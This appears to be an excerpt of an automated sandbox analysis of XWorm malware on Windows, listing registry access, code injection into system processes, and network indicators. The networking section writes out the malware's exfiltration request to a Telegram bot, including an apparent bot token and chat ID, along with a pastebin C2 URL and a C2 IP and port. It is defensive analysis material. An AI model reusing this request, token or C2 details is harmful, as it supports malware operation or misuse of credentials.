                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_1C56D654 FindFirstFileExW,3_2_1C56D654
                              Source: C:\ProgramData\KrnlSetupSus.exeCode function: 3_2_1C56D7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_1C56D7D8
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_00000290EDD0D654 FindFirstFileExW,6_2_00000290EDD0D654
                              Source: C:\Windows\System32\dllhost.exeCode function: 6_2_00000290EDD0D7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,6_2_00000290EDD0D7D8
                              Source: C:\Windows\System32\winlogon.exeCode function: 7_2_000002E99175D654 FindFirstFileExW,7_2_000002E99175D654
                              Source: C:\Windows\System32\winlogon.exeCode function: 7_2_000002E99175D7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,7_2_000002E99175D7D8
                              Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000213BDCED7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,10_2_00000213BDCED7D8
                              Source: C:\Windows\System32\lsass.exeCode function: 10_2_00000213BDCED654 FindFirstFileExW,10_2_00000213BDCED654
                              Source: C:\Windows\System32\svchost.exeCode function: 11_2_00000158709DD7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,11_2_00000158709DD7D8
                              Source: C:\Windows\System32\svchost.exeCode function: 11_2_00000158709DD654 FindFirstFileExW,11_2_00000158709DD654
                              Source: C:\Windows\System32\dwm.exeCode function: 12_2_0000026DB158D654 FindFirstFileExW,12_2_0000026DB158D654
                              Source: C:\Windows\System32\dwm.exeCode function: 12_2_0000026DB158D7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,12_2_0000026DB158D7D8
                              Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002A3F066D654 FindFirstFileExW,13_2_000002A3F066D654
                              Source: C:\Windows\System32\svchost.exeCode function: 13_2_000002A3F066D7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,13_2_000002A3F066D7D8
                              Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002C9AFBBD7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,15_2_000002C9AFBBD7D8
                              Source: C:\Windows\System32\svchost.exeCode function: 15_2_000002C9AFBBD654 FindFirstFileExW,15_2_000002C9AFBBD654
                              Source: C:\Windows\System32\svchost.exeCode function: 16_2_000002C06FD4D654 FindFirstFileExW,16_2_000002C06FD4D654
                              Source: C:\Windows\System32\svchost.exeCode function: 16_2_000002C06FD4D7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,16_2_000002C06FD4D7D8
                              Source: C:\Windows\System32\svchost.exeCode function: 17_2_000002917C3BD654 FindFirstFileExW,17_2_000002917C3BD654
                              Source: C:\Windows\System32\svchost.exeCode function: 17_2_000002917C3BD7D8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,17_2_000002917C3BD7D8

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.8:49713 -> 149.154.167.220:443
                              System process connects to network (likely due to code injection or exploit)
                              Source: C:\Windows\System32\svchost.exeDomain query: pastebin.com
                              Source: C:\Windows\System32\svchost.exeDomain query: api.telegram.org
                              C2 URLs / IPs found in malware configuration
                              Source: Malware configuration extractorURLs: https://pastebin.com/raw/Zx6DUkf9
                              Connects to a pastebin service (likely for C&C)
                              Source: unknownDNS query: name: pastebin.com
                              Uses the Telegram API (likely for C&C communication)
                              Source: unknownDNS query: name: api.telegram.org
                              Yara detected Generic Downloader
                              Source: Yara matchFile source: 0.2.RdLfpZY5A9.exe.12964350.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 3.0.KrnlSetupSus.exe.bc0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.RdLfpZY5A9.exe.1294ef08.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\ProgramData\ntoskrnl.exe, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\KrnlSetupSus.exe, type: DROPPED
                              Source: global trafficTCP traffic: 192.168.2.8:49716 -> 115.69.183.222:37593
                              Source: global trafficHTTP traffic detected: GET /raw/Zx6DUkf9 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /bot6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI/sendMessage?chat_id=5999137434&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A1A2A8BD1A549B29BFB2C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20KMXL7DUF%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20ezzznikka HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                              Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                              Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                              Source: unknownDNS query: name: ip-api.com
                              Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                              Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                              Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                              Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                              Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                              Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                              Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                              Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                              Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                              Source: unknownTCP traffic detected without corresponding DNS query: 115.69.183.222
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficHTTP traffic detected: GET /raw/Zx6DUkf9 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /bot6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI/sendMessage?chat_id=5999137434&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A1A2A8BD1A549B29BFB2C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20KMXL7DUF%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20ezzznikka HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                              Source: global trafficDNS traffic detected: DNS query: ip-api.com
                              Source: global trafficDNS traffic detected: DNS query: pastebin.com
                              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                              Source: Microsoft-Windows-LiveId%4Operational.evtx.21.drString found in binary or memory: http://Passport.NET/tb
                              Source: lsass.exe, 0000000A.00000000.1462114586.00000213BCE49000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicer
                              Source: lsass.exe, 0000000A.00000002.2814369163.00000213BD61E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRoot
                              Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463595674.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2806534941.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2800284213.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462178679.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE49000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                              Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463329054.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2800284213.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2802048969.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463446975.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2797148906.00000213BD460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                              Source: lsass.exe, 0000000A.00000000.1463231938.00000213BD444000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2784025067.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462178679.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463357338.00000213BD471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2798365665.00000213BD471000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                              Source: lsass.exe, 0000000A.00000002.2793097591.00000213BD400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2814369163.00000213BD613000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
                              Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463595674.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2806534941.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2800284213.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                              Source: powershell.exe, 00000008.00000002.1661530005.000001FE7C9C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                              Source: powershell.exe, 00000008.00000002.1661530005.000001FE7C9C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mU
                              Source: lsass.exe, 0000000A.00000000.1462114586.00000213BCE49000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.dX
                              Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463595674.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2806534941.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2800284213.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462178679.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                              Source: lsass.exe, 0000000A.00000000.1463231938.00000213BD444000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2784025067.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462178679.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463357338.00000213BD471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2798365665.00000213BD471000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                              Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463329054.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2800284213.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2802048969.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463446975.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2797148906.00000213BD460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                              Source: lsass.exe, 0000000A.00000002.2793097591.00000213BD400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2814369163.00000213BD613000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
                              Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463595674.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2806534941.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2800284213.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE49000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                              Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                              Source: lsass.exe, 0000000A.00000000.1462114586.00000213BCE49000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/Dig
                              Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463329054.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2800284213.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2802048969.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463446975.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2797148906.00000213BD460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                              Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463595674.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2806534941.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2800284213.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                              Source: lsass.exe, 0000000A.00000000.1462518169.00000213BCEB8000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2788373809.00000213BCEB8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                              Source: lsass.exe, 0000000A.00000002.2793097591.00000213BD400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463231938.00000213BD400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                              Source: lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
                              Source: lsass.exe, 0000000A.00000002.2784025067.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462178679.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
                              Source: lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                              Source: RdLfpZY5A9.exe, 00000000.00000002.1406303961.0000000012938000.00000004.00000800.00020000.00000000.sdmp, KrnlSetupSus.exe, 00000003.00000000.1404695399.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, KrnlSetupSus.exe, 00000003.00000002.2788044587.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, KrnlSetupSus.exe, 00000003.00000002.2814408565.0000000012DF2000.00000004.00000800.00020000.00000000.sdmp, ntoskrnl.exe.3.dr, KrnlSetupSus.exe.0.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                              Source: powershell.exe, 00000004.00000002.1499817567.000001A84BBE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1499817567.000001A84BA3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1639704438.000001FE742FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                              Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463595674.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2806534941.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2814369163.00000213BD61E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463329054.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463231938.00000213BD444000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2800284213.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2784025067.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2802048969.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2793097591.00000213BD400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463446975.00000213BD551000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2814369163.00000213BD613000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462178679.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463357338.00000213BD471000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2797148906.00000213BD460000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2798365665.00000213BD471000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                              Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                              Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1463595674.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2806534941.00000213BD5B1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2800284213.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE49000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                              Source: lsass.exe, 0000000A.00000000.1463404935.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2800284213.00000213BD4BD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                              Source: powershell.exe, 00000008.00000002.1574489428.000001FE644B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                              Source: svchost.exe, 00000014.00000000.1529745173.000001486A5B0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                              Source: powershell.exe, 00000008.00000002.1574489428.000001FE644B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                              Source: lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                              Source: lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                              Source: KrnlSetupSus.exe, 00000003.00000002.2788044587.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1460763535.000001A83B9D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1574489428.000001FE64291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: lsass.exe, 0000000A.00000002.2784025067.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462178679.00000213BCE4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
                              Source: powershell.exe, 00000008.00000002.1574489428.000001FE644B9000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                              Source: lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
                              Source: lsass.exe, 0000000A.00000002.2781804179.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000A.00000000.1462114586.00000213BCE2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
                              Source: powershell.exe, 00000008.00000002.1574489428.000001FE644B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
